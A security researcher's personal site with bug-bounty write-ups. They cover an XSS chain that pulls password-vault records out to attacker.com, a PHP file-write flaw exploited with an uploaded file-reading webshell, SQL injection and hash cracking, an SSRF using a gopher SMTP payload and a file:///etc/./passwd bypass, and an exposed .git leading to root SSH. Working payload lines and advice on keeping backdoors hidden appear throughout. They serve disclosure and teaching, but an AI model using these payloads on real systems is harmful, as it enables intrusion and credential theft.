• Twitter
  • Facebook
  • Youtube

About me

Let me introduce myself


A bit about me

i'm Shawar Khan.

As a Security enthausiast, within 3 years Shawar Khan identified major security vulnerabilities in the world's well-known companies including Google, Microsoft, Apple, PayPal. Acknowledged by over hundreds of companies and listed in over +100 Halls of Fame.

Profile

Shawar Khan

Personal info

Shawar Khan

A Security Researcher, Python enthusiast and a Synack Red Team (SRT) Member.

Acknowledgements: List Here

Hackerone: View Hackerone profile

BugCrowd : View Bugcrowd profile

Skills & Things about me

Web Application
100%
Penetration Testing
Mobile App
90%
Penetration Testing
Python
90%
Exploit Writing

Write-Ups

My recent research work


Wednesday, August 22, 2018

The dark side of XSS and hacking into Password Vault




Greetings everyone, been a long time since my last Write-up. Today, I want to share something really interesting with you guys. You guys might have used many kinds of Passwords Vaults/Managers that helps you store passwords of different kinds of websites such as Facebook, Gmail and other accounts. So, the vault should be protected enough to secure your data right?

The Scenario

In the scenario that I experienced was having the same functionality, but in addition to account owns passwords, it was also having passwords of company employees. The interesting thing is I was able to hack into the Password Vault that stores user passwords by exploiting a Cross-Site Scripting vulnerability that I found in the same domain.

So, whenever I test an application the first thing is that I identify what kind of company am I targeting. In this case this was the Password Manager, so as you all know it is a vault that stores passwords. The "Passwords" are the sensitive data that it (tries to) protect. Capturing and retrieving those passwords was my initial goal.


2 records added to Password Vault containing account passwords

The flow of application

In order to understand how the application is working, we need to understand its functionality and its flow. We need to understand how data is retrieved and from where is it retrieved. 

After carefully observing the application and going through each and every request I found that the application was retrieving different information from the API that was located at /api/ of the application. 

After a bit of crawling and spidering through the application I found some API endpoints:


API Endpoints to look into

As the application was fully interacting with the APIs, I understood the flow as each endpoint was returning some value and information such as record ID, session token and other things. Let me explain some of the APIs that i though might help in achieving my goal.

The records/all endpoint

An endpoint that was located at /api/v3/records/all and it was accepting a GET request. Once a GET request is sent while being authenticated, it returns JSON objects having record ids and other information related to available records.

JSON response from /api/v3/records/all

The passwords/record endpoint

This endpoint was basically located at /api/v1/passwords/record . After the record IDs were retrieved from the record/all endpoint, this endpoint is used to retrieve passwords and full information from those specific record IDs.

In our case we got the following record IDs:

  • 526882 - ID for "Facebook Account" record
  • 526883 - ID for "Google Email" record

If a user clicks on the "Facebook Account" record, a POST request to /api/v1/passwords/record will be sent using the following JSON data having the record ID 526882:
Record ID being sent to API for retrieving full record information
and this will return the following information for the specified ID:
Full information of specified Record ID returned by the endpoint leaking Password & Usernames.
Now we know how IDs are being retrieved and how their data is returned but the issue is the application sends a CSRF token with every POST request that is sent to the API. A "token" should be present in the request in order to validate the session of the user.

The session/token endpoint

So in order to find out how that token was made. I looked up other endpoints to see if there was anything informative and I found that the API endpoint located at /api/v1/session/token was responsible for the generation of CSRF tokens. 

Making a GET request to the endpoint returns the following response:
Session/CSRF token returned by API endpoint

Loading the Weapon 

Now that we came to know about the flow of the application and the endpoints that are being used for exchange of data. We need to somehow obtain information from the following endpoints:
  • Session Token from /api/v1/passwords/record
  • Record IDs from /api/v3/records/all
  • Record Information from /api/v1/passwords/record

In order to obtain information from the endpoints, a simple trick would be exploiting some misconfigured CORS but the application doesn't seems to be using it for resource sharing.

The other possibility was to find XSS vulnerability somewhere on the same domain in order to get rid of Same-Origin Policy(SOP). Else all of our XHR calls will be vanished and rejected due to violation of SOP.

So, after a while I was successfully able to get XSS at an email activation page where user supplied email was reflecting back improperly.

So let me give the world's most common demonstration of an XSS:
A popup without actual demonstration of risk




Alright, we just got ammo for our weapon. Now no need to worry about the SOP and we can easily make XHR calls in order to communicate with the APIs in the same way the application did.


Replicating the application flow

Now that we have all the things required, we have to replicate the application flow. In order to make an XSS exploit that replicates the application flow and grabs all the information needed we need to make sure it proceeds in the same way.

First, we will use the javascript function fetch() in order to make a GET request to /api/v3/records/all in order to obtain all the record IDs:
Using fetch() to retrieve record IDs from the API

after the records are grabbed the next thing is to get the session token in order to make POST requests. I also converted the response of records to JSON and called the value of record ID directly from the JSON object. A fetch() was used for sending a GET request for capturing the token and retrieving its value from the JSON object:

A fetch() being used for retrieving session_token as seen on line #20

Now we got the "session_token" & the "record IDs". Now all we have to do is to is to send a POST request having the "record ID" to /api/v1/passwords/record. I'll use the XHR to send a POST request with a specified record ID. I will loop through the record IDs so each record information will be retrieved one by one:

As you can see from line #30-34, XHR is being configured with proper details. On the line #45 the values are placed in a proper form {"id":record_ID_here,"is_organization:false} and the request is made afterwards.

Once the request is made, the response will be parsed and values will be grabbed such as Title, URL, Username, Password from the response. The values will be then added to a dummy variable "data_chunks" for final processing.

Storing data chunks to a dummy variable

After the dummy variable is filled with collected data, it will be converted to base64 to avoid conflicts of bad characters and will be sent to attacker's host.

Sending collected data as base64


Note: There are many other methods to properly send the grabbed data but in order to demonstrate i'm using a simple way such as directly sending the base64 encoded data. Sending data via POST to a specific file would also be an exciting option.




Aiming & Shooting the target



Now that our exploit is completed, we have to inject it into the vulnerable area of XSS.  There are 2 simply tricks that can be used when exploiting an XSS.

  • Hosting your javascript exploit on external host ( You might have to set up CORS in order to make it accessible )
  • Including the payload directly with eval and atob
For the first technique, the external JS needs to be loaded via newly injected <script src="http://attacker.com/path_to_exploit.js"></script>. This method is efficient when handling large exploit code and for some extra anonymity ( Exploit code won't be logged in server )

The second method is quick and can be used for handling short payloads. I'll be using the following payload:

Base payload to use


now simply replace atob()'s value with our base64 encoded source code will do the trick. First our payload will be base64 decoded by atob and then it will be executed using eval().

So here is the final payload:
Final payload ready for execution




Note that some people will say its a kind of large payload, obviously it is but still we can just load the .js from external Host but in order to avoid setting up CORS, I'm using this technique.

Now i'll just host a exploit.html file having the following code:

HTML file for making a redirection to a larger URL





Now simply giving a URL for exploit.html, the attacker can make a user redirect form http://attacker.com/exploit.html to the page where large payload is injected.

As a result, we will get the data to our host that we configured for retrieving data:

Exploit successful! Vault information retrieved.







From the screenshot above, you can clearly see that the records stored in the Password Vault were finally retrieved and we successfully exploited and escalated the impact of an XSS vulnerability!

The purpose for this write-up was to clarify that:



XSS isn't just a popup, XSS vulnerability can lead to serious damage if properly exploited. Even if it's demonstrated via a harmless popup execution still it poses a risk.

If you guys love this write-up, Share! :)

Btw, I've uploaded my exploit-code here so you can review: https://gist.github.com/shawarkhanethicalhacker/e40a7c3956fdd24b9fb63d03d94c3d34

Sunday, August 19, 2018

Who am i?


The sides of Cyber world

As everyone knows, Hacking is one of the serious discussions when it comes to computers and technology. As the world is getting advance in technology, the risks of getting compromised gets higher due to the fact that the criminals are getting advanced too by using the technology we use. There is always a good side and a bad side of people in every field, just like it there are Hackers who hacks and targets people and there are Hackers who protect them from these kind of attacks. The good ones are mostly known as the White Hats and the other ones are referred as Black Hats. Most of the companies and organizations hire hackers in order to identify security flaws and glitches in their products or applications that can help them prevent cyber attacks and breaches.

Who am I?

I’m Shawar Khan, a Security Researcher & a Synack Red Team (SRT) Member from Pakistan. As the advancements of technology increases, I play my role in protecting the cyber world from security breaches. Consider me a person on the positive side of the community, It’s been over years in the field of Computer Science and Hacking and I have experienced many things in my career as a Hacker which includes data breaches, challenges and tough targets but still I am on my track to get the job done. Basically, the initial job of people like me is to keep the web safe. I mostly participate in Bug Bounty programs on Hackerone and pentest applications so that I can help the companies get safer with time. In my career there were many achievements that I got with a period of time. Over 100 Halls of Fame were awarded by companies like Google, Microsoft, Apple, Amazon, Ebay and some other companies

How i got into Hacking?

This all started with an initial interest in Computers. Before some years ago when I was around 11 years old, I got my first computer and I was quite interested in learning how to use it. At that time I used to play computer games and stuff. I was not having internet connection at that time so I used buy DVDs of softwares and programs that I can explored. After a few years I got interested in designing 3d Models using some programs like 3dsmax, Maya etc. I got quite good grip on computers at that time as I became familiar with most of the things. I was mostly interested in VFX designing and 3d modeling at that time when I was around 13, 14 years old and I created my Facebook account. The step towards the usage of internet was quite interesting, I met few people over there. The main thing was the interest in Hacking that attracted me towards it when one of my friend’s account was hacked and he told me his password was changed unintentionally. I was quite amazed that how come someone change a password remotely. At that time the web application were not very secure and people easily managed to compromise accounts. I started looking for methodologies for doing it. Sadly, all methodologies on the internet were fake as they told me to crack md5 hashes returned by fake websites and all tools available were fake and infected.

The first step on the stairs

I contacted some people on Facebook who claimed to be “Hackers” and they told me to learn PHP and other languages. So I was not sure how I would proceed towards my goal but still I took it as a first step. I learnt different languages like PHP, JS, HTML, Python from codeacademy.com which was a site I used to learn from. I was able to develop scripts and websites using those languages and I got quite good grip over it. By learning those languages i was able to understand how web applications and websites are made but that wasn’t enough as I was still unable to reach my goal. I started to Google for topics related to Hacking and methods on how I can hack websites. In a short period of time I learnt techniques like SQL Injections, Backdooring, Keylogging, Shelling. I was able to hack most of the websites, computers and mobile phones using the techniques that I learnt.

Being on the good side

Instead of hacking websites and compromising things, I wanted to be on the good side and wanted to protect them from people who used to hack and compromise. I identified different vulnerabilities in websites and reported it to them. I was then introduced to Bug Bounty program these were the policy of web applications that if someone report a security issue to them they will reward the researcher. In a few years I earned some decent amount and a number of gifts when I was around 17. In a few years, I was awarded by Google, Microsoft and many other companies and I was featured in many websites and pages which was a turning point in my career. I became well known in the community and kept the good work by learning more. I studied books and blogs of different researchers and had some interesting discoveries which I mostly upload and discuss on my website shawarkhan.com, I do most of my write-ups and articles on my site regarding my discoveries.

Be Independent or Do a Job?

This is another important question from the people who are on track. Most of the people who used to be an independent researcher while some of them want to be on a job. Both things have some cons and pros. I am an independent researcher and I work independently because by working alone I can educate myself and can learn things in my own schedule plus I will be able to face challenges myself. When a person works alone, he can target anything he want and he can work according to his needs while in a job the person has to work on the projects or things selected by the company etc. Doing a job will allow the person to gain professional experience and will also help him adopt a better working environment. I choose to work on my own and everyone has a different perspective.

How can one become a researcher from scratch?

Being a security researcher means to be someone who has mastered the aspects of cyber security. This means if we are referring to Web Application then we have to know about almost everything about it. We need to know about each mechanism and functionalities of it and how things interacts with it. We need to learn about API and how things communicate using that. Once we know how these things works, we will understand each thing from a security perspective. I suggest that a person should learn languages such as PHP, JS, HTML first so the person will learn how to create a web application using them. I did the same at the initial stage when i was learning them, after learning the web application and its creation we have to study these from a security perspective. The book I studied first was the “Web Application Hackers Handbook” ( https://www.amazon.com/Web-Application-Hackers-Handbook-Exploiting/dp/1118026470 ). This book includes everything you need to know about Web Application Security including its flow and the techniques used to exploit them. The next step is to learn the testing methodology, the book WAHH teachers everything but the OWASP Testing Guide v4 teaches a proper methodology on how one should approach its target.  You can find the book at this address ( https://www.owasp.org/index.php/OWASP_Testing_Guide_v4_Table_of_Contents ). For the people who are on track, I’d suggest them to read disclosed reports on Hackerone.com if they want to polish their skills. Resources such as Blogs, Slides and Conference Talks are another important thing to study, they can be found on Youtube and slideshare.com. Conferences such as BlackHat, DEFCON have videos on Youtube regarding different researches and discoveries.

How should a person work daily?

On an average, a beginner should be focusing on Learning Languages around 3, 4 hours daily which includes practice and learning as well while the person who is on track and who is willing to polish his skills should focus on Conference talks and Researcher’s blog and should invest maximum time in it. Learn from your seniors, their research is your source of advancement.

How do i educate myself?

As most of you know, I'm a self learner. When I first started, I only knew XSS vulnerability and using that one vulnerability I XSSed many companies including Google and some other companies so the main goal is to practice more and more. Most of my study material includes “Books” and “Blogs”. In my free time, I select random targets and test them in order to learn new techniques and get maximum experience. Getting experience is the main thing no matter what you are doing, always try to hack into something and everytime you will learn something new. Learn about the services that the target is using. For example if a site is using Wordpress, learn how to hack Wordpress and retest the target once you have mastered its techniques. Whenever you find a vulnerability, don’t just report it. Try to understand the cause, achieve the maximum access possible, chain different vulnerabilities to maximize the impact scale. For example, an XSS vulnerability can be used to achieve Remote Code Execution if we are able to interact with functionalities that make server side changes and can also be used to bypass CSRF protections by stealing CSRF tokens via XHR calls. Similarly, there are many methods to achieve higher impact by chaining vulnerabilities, There are many articles on that on my website. This is another discovery where i chained multiple issues to hijack a user’s account: https://www.shawarkhan.com/2017/09/exploiting-multiple-self-xsses-via.html .

My Approach

My testing methodology is mostly based on server-side penetration testing. When I get a target, I first understand how it works and what the functionalities are. I try to exploit the logic of the application first if the target is a bug bounty program. On the other side, when I am targeting a huge company or a top organization i invest maximum time in the Recon phase of my testing. This includes capturing credentials, sensitive information and panels that the company uses to access higher level functionalities. You can see one of my recent articles https://www.shawarkhan.com/2018/06/getting-php-code-execution-and-leverage.html and https://www.shawarkhan.com/2017/10/remote-code-execution-from-recon-to-root.html that are based on proper Recon. When first approaching a target, the first thing is to map the targets and the structure. Tools like “dirsearch”,”dirb” will help identifying sensitive paths and files on the target server. Tools like “sublist3r”,”amass”,”subfinder” are mostly used for identifying subdomains. When I find a vulnerability, I try to maximize its impact and I write exploit for the vulnerability for the demonstration. This was one of my XSS exploitation tool that was built for exploiting a vulnerability in a famous social app named Sarahah: https://www.shawarkhan.com/2017/08/sarahah-xss-exploitation-tool.html


Covering things up

Now the final thing everyone wants to know is, how can one become a hacker? Well, this isn't easy to answer but keep a few points in mind. You have to be the best out there, you need to learn the fundamentals of what you are targeting first after that you need to learn how it is made how it works and how it interacts with things.

Hacking isn't easy, it's like being Ronaldo or Messi


Some of the points to be noted:

  • By a Self-Learner: Why? Because without it you won't learn from things you experience, you won't be able to solve your problems.
  • Educate your self on daily basis: read articles, write-ups, videos or slides to educate yourself
  • Know your target, before proceeding make sure to know your target. Invest most of your time in identifying your target identifying the services the target uses.
  • Map the target: get a better view of the target's infrastructure in order to get a better understanding on what to target.
  • Walk the path no one travels: Don't be the common dude out there. Think out of the Box, think what the developer missed think what common guys are targeting, depending on that choose your path.
  • Be a ninja: You need to be fast and precise as a Ninja. Know,Map,Target your victim precisely and quickly. This only works if you are good are talking the different path and if you are unique.
now I hope you guys got my point, you have to be the best of the best. So now go ahead and learn how things work :) You got a long journey to go.

Friday, June 1, 2018

Getting PHP Code Execution and leverage access to panels,databases,server



Greetings everyone,

This is Shawar Khan and it's been a while since my last write-up and i wasn't able to do some write-ups due to some reasons so today i decided to do a write-up on one my recent discovery and my approach using which i was able to get read,write access on a server plus i got access to their panels and database as well.

So, lets get started.

Taking the initial steps:

Let the company be Redacted.com, the first approach was to map the target application in order to get a clear view of the target surface. Fired up some enumerators,scrappers and stuff so i can get all the public subdomains of target application but there wasn't much subdomains found and most of them were static so i moved on to Host discovery phase in which applications like Shodan & Censys plays their role.

A quick search by domain name on Censys and found the following host:

Alright, then i had a subdomain server1.redacted.com which returned the following contents when visited over http:



They were using LiteSpeed server and returned a 403 Forbidden error. Means that we were not allowed to access the main page so in these kind of cases all we need to do is the enumeration of their files and directories places to get a proper map of the application. By simply applying google dorks and search on some engines i found that this subdomain was not indexed and nothing returned any kind of contents that i can make use of.

What now? Enumerators right?

I fired up dirb, dirsearch and some other magical tools with some custom wordlists and stuff and found that the server blocked the IP after every 10 requests, i could add some delays and use some proxies to bypass this IP based protection but that won't do the trick as we had to do an intense enumeration over that target so that won't be the trick.

Going though a different path:

So as everything had failed such as tools,search engines and areas having public info the only way left was to check for their snapshots and sitemap that was cached by wayback(archive.org) web archive. This trick worked every time for my and mostly got backups and stuff on servers when there is a deadend like this one.

So, a simply request to cdx endpoint of wayback web archive with the specified domain we got the following results:



So, got something that i can make use of somehow. There were 2 files which exists, the GetAndroid.php returned nothing but a blank page but when accessed files.php it returned some PHP errors as error_reporting was turned on:
The error returned contains the server path and the username but which seems interesting was the error that was undefined index. That simply mean't it was using a specific index which was not passed which in this case was the url parameter. So i tried to pass the new parameter with some random value and the following was the response:

Now this is where the fun part starts! The server returned an error message which was having another index missing this time it was a data parameter. But the thing that caught my attention was the warning that said file_get_contents(woot): failed to open stream: No such file or directory!

Yes! My input which i gave to url parameter was directly passed to the file_get_contents function of PHP which is used to retrieve contents of a given file. Before moving further lets take a quick note of the functionality of files.php:

1. There were 2 parameters ( url , data )
2. url parameter was loading the content using file_get_contents
3. data parameter was also added to the content that was ready to made
4. The content is then uploaded to another domain in the extension that we choosed

If we input url=woot.txt , a file such was random-num_woot.txt will be created and it will have the contents of the file that was given in url parameter. So i tried making a request with the following params:

http://sub.redacted.com/files.php?url=/etc/passwd&data=

and got a file uploaded on http://sub1.redacted.com/wafiles/randomnum_etc_passwd.txt
i tried to open it and it was having the following content:


and bingo! i was able to read the password file. Now the interesting part was that it was loading local files and then it was uploading the local file on another domains so it loaded the contents of passwd file on their separate subdomain which i was able to access.

Note the random numbers after | at the end of the file, that is where the input of "data" parameter is reflected. So that means we are able to create any extension on the domain and able to inject any content. I tried creating a php file with an echo command using the following data:

http://sub.redacted.com/files.php?url=file.php&data=<?php echo 1337; ?>

and a php file was created as 32142410_file.php and upon opening it returned 1337 which means my echo command was successfully executed! Sadly i was not able to execute any kind of system command by any mean as they were disabled. So instead of making a file with content and opening it again i simply uploaded a php code with file_get_contents() and the following was the data:

 http://sub.redacted.com/files.php?url=s1.php&data=<?php $fsss=file_get_contents($_GET['file'],true);echo $fsss; ?>

This will simply return the content of filename that i will provide as value of file parameter and i got the following response from files.php:
accessing the newly uploaded file with data=/etc/passwd i got the following:

 Now we got a pretty quick way to read contents of files. I uploaded another code using which i was able to get list of files in a specific directories so i can get a better view of what exists on the server:

Next using both files i started downloading sourcecodes of different PHP files,config files,logs and stuff and kept testing if i could bypass their security and able to execute codes. But after hours spending on the site i decided to retest it on the next day.

The Next Day

So, i tried to upload the code again as the previous code got deleted and upon making a request to "files.php" i got the following response:

and sadly, the files.php was modified and their firewall was given a new signature that was blocking every malicious payload sent and i was no more able to create custom executable extensions such as php. So, a patch was deployed!

Dead end?

I thought i should give up as there was nothing i could do to read files or to gain access as this was the only known way but later i remembered that i downloaded source codes of different files. So i tried to analyze their sourcecode of phpfiles to see if i can find any vulnerabilities. There were hundreds of files and checking each one by one was not the solution so i tried to search code snippets having a specific keyword such as "mysql_query" as using that we can see if any code executing a SQL query is vulnerable to SQL Injection or not.

I used the command: grep -r 'mysql_query' ./*.php | grep '$_' 

and i found that a file sms.php on the main domain was having some protection missing on "number" parameters. 


Seems like the developer really knew to protect against these kind of attacks by using mysql_real_escape_string as we can see on line 155 but as human make mistakes, the developer forgot to filter input on line 140 and it is directly passed to the query.

In order to reach the execution flow we have to first pass a 'do' parameter having a value 'GetNumber' then we have to pass another parameter 'key' having our payload:
http://redacted.com/sms.php?do=GetNumber&key=1'

i got the error:  MySQL Error 1064: You have an error in your SQL syntax

So i fired up sqlmap to get the work done quickly but after 10 requests it got blocked so manual was the only way to exploit it. I manually exploited the vulnerability and i was able to grab passwords from their database:
i dumped credentials for 10 of their staff members:

Hashed passwords :| , They were md5 so i was able to easily crack them using hashkiller:

Boom! Plain text passwords for 7 users and one of them was administrator! 
While having  read/write access using files.php i reconfigured some .htaccess files on admin panels as they were having some HTTP based protection so i modified them and accessed admin panels. The panel next asked for credentials that i got via SQLI and i was able to login:
 
Due to my initial steps that i quickly took when had access i accessed the panel. Because first there was HTTP based protection and is was having IP based restrictions, i modified the htaccess to my ip can access the panel, next i found the password via SQLI which i found from sourcecodes that i downloaded from initial vulnerability.

What did we learned?

Suppose we got read access on a server, the first thing that we always should do is to download the sourcecodes of their internal files, we can find many juicy information from there such as credentials,panel passwords,and vulnerabilities. Next thing is that if we are uploading backdoors, make sure to backdoor something which is not commonly removed so keep multiple instances of your backdoors. By the way, the SQLI was fixed right after i accessed the panel so that was a quick move! You always have to be a quick one because everything should be done in time else your moves can be detected. So this was my discovery and approach on my recent target, kindly let me know in the comments if you love this write up and if it helped you.

Things we achieved:

PHP Code execution
Read/Write access on server
Panel Access
Database Access
and many more.

 

Monday, May 21, 2018

Getting read access on Edmodo Production Server by exploiting SSRF



Hey Mates!
This is Mustafa Khan, Two weeks back I was planing to hunt some bounty sites to get some $$ but had some private programs and most of them seems to be secured and most of the researchers hunted it before me so had zero luck. 😞
Since I was disappointed and got bored so I thought to retest The Great Edmodo. while scanning for subdomains I got some interesting subdomains and starting to explore it. While checking each of the subdomains I chose my target which was Edmodo.

In this writeup I am going to disclose my recent finding of Edmodo. I found an SSRF vulnerability by exploiting which i was able to gain Read-access on their production server.

While exploring their services and subdomains I came across a subdomain ‘partnerships.edmodo.com’. This domain was having a registration area where publishers can register by submitting a form. The site was basically using Wordpress CMS and I tested it accordingly but wasn’t able to exploit the CMS as it was using the latest and secure version. So I turned on my interception proxy(Burp suite) and monitored each and every request and found that while writing data to the form a POST request was being sent to the following URL:

https://partnerships.edmodo.com/wp-content/themes/edmodo-developers/form-proxy.php?url=https://www.edmodo.com/index/
ajax-check-in-db


Seems like the form-proxy.php was somehow sending data to the file ajax-check-in-db, I tried replacing ‘url’ parameters value to http://my-ip-address and I was able to get a GET request to my server! Next I tried using http://127.0.0.1:80 but that didn’t worked! So I tried using ‘localhost’ and http://localhost:22 returned the following response:

{“status”:{“http_code”:0},”contents”:false}

Alright, so that was a negative response, I tried to see if SMTP service was enabled so I used http://localhost:25 and got the following response:

{“status”:{“http_code”:0},”contents”:”200 pod-200279 ESMTP Postfix (Ubuntu)\r\n221 2.7.0 Error: I can break rules, too. Goodbye.\r\n”}

Bingo! I was able to grab the SMTP banner! Now I was able to do an internal port scan using this SSRF vulnerability. I used burpsuite intruder in order to find other ports by including a range of ports and had a different response for open ports. I was able to grab banners of FTP,SSH and some other services as well.

Alright, now what next?

After that i ran another burp intruder and detected different schemes being used i found many of them were enabled and the most interesting one was the Gopher. As we know SMTP can be exploited if we have Gopher protocol enabled so I tried to check if gopher is enabled and it was enabled! There were other schemes available as well such as ftp and some other.

Now the next thing was, I have to inject CRLF and new line characters and have to pass my arguments to SMTP service via Gopher protocol. Using gopher protocol we are able to communicate with these kind of services so I created a PHP file on my server having the following code:


<?php
        $commands = array(
                ‘HELLO victim.com’,
                ‘MAIL FROM: <admin@edmodo.com>’,
                ‘RCPT To: <MYEMAIL@gmail.com>’,
                ‘DATA’,
                ‘Subject: WOOT’,
                ‘woot woot! Edmodo PWNED 😛’,
                ‘.’
        );

        $payload = implode(‘%0A’, $commands);

        header(‘Location: gopher://0:25/_'.$payload);
?>

after setting the url parameter to the path of my PHP file i was able to redirect the vulnerable application to the Gopher scheme having my payload and i was able to communicate with the SMTP service! I was able to receive email from admin@edmodo.com ! Using this I was able to send emails from their server!


Now here comes the interesting part. The ‘file’ scheme was also available using which I was able to read files on their server. I tried accessing file:///etc/hosts and I was able to get the content of hosts file:


But when I tried file:///etc/passwd it returned an Error, there might be some kind of firewall detecting the signature. Kudos to Eric! I used a ‘./‘ as Eric told me and the final Url was file:///etc/./passwd and I was able to get the content of passed file!


Now we got read access over their production server! I was able to read any file of their server plus i was able to communicate with their internal hosts, do internal port scans, make requests from server and many other things!

Bundles of thanks to the following Good friends of mine for helping me out to take this bug to the next level. {Shawar Khan, Zain Sabahat, Eric johnson}

Thursday, October 5, 2017

Remote Code Execution - From Recon to Root!

Greetings everyone! This is Shawar Khan and today i'm going to share one of my recent findings. I'll show you how proper recon can lead to code execution. Recon and information gathering is an important part of penetration testing as knowing your target gives you more areas to attack.

So, a friend of mine gave me an IP address which was having an Admin Panel for test. After pentesting the panel, i knew that it was not bypassable and every layer was properly protected. There was no info available about the IP address, so a quick file enumeration!

nothing interesting found, but a '.git' directory!

Alright, so '.git' contains a 'config' file where we can find the repository from where the files were cloned, sometimes we can find passwords for a password-protected repository in 'config'!

Unlucky... No credentials found. The next thing to check was to see if the .git directory is having directory listing or not. If there is directory listing, we are able to clone all the files include objects:
 and Yes!
and Directory Listing was enabled which means we can download all the files and can run git status to get paths of all the files available on apache. Using the following command i cloned the files:

wget -m -I .git http://IP/.git/

cloned the files and then 'git status'

found '3398' files!
Some 'xlsx' files having data of Users!


Accessed the files and got the data!

interesting that the git status command was showing files as removed but they were available. This was not the end, found an interesting file:
Backup files! One file was having entire user data and the other tar file was having the backup of all files on the web. So now i was having access to source code!

Now it was time for a code review of those files but wasn't crazy enough to review all of them as i was excited to gather some more interesting stuff. Did a quick grep to see if i can anything related to SSH:

grep /PATH/ -rnw -e 'ssh'


and i was amazed to see what i found in a PHP file:


Got SSH & Git Password! Time for SSH:

Server access with Root Privileges! That's the End ;)
Some more critical issues and another RCE was identified via code review but i guess this is the most interesting one among them.

The vulnerability was reported and the fix is now deployed.

Polish up Recon skills and you'll get what no one else could!
Good Luck and Thanks for watching. Please share if you love this write-up.

Services

What can I do


Web-App Penetration Testing

Provides a complete Penetration Test against the web application in order ensure its safety.

Android App Penetration Testing

Provides Android Application Penetration Testing in order to make the app & secure.

iOS App Penetration Testing

Provides iOS Application Penetration Testing in order to make the app & secure.

Want my services?

Get in touch with me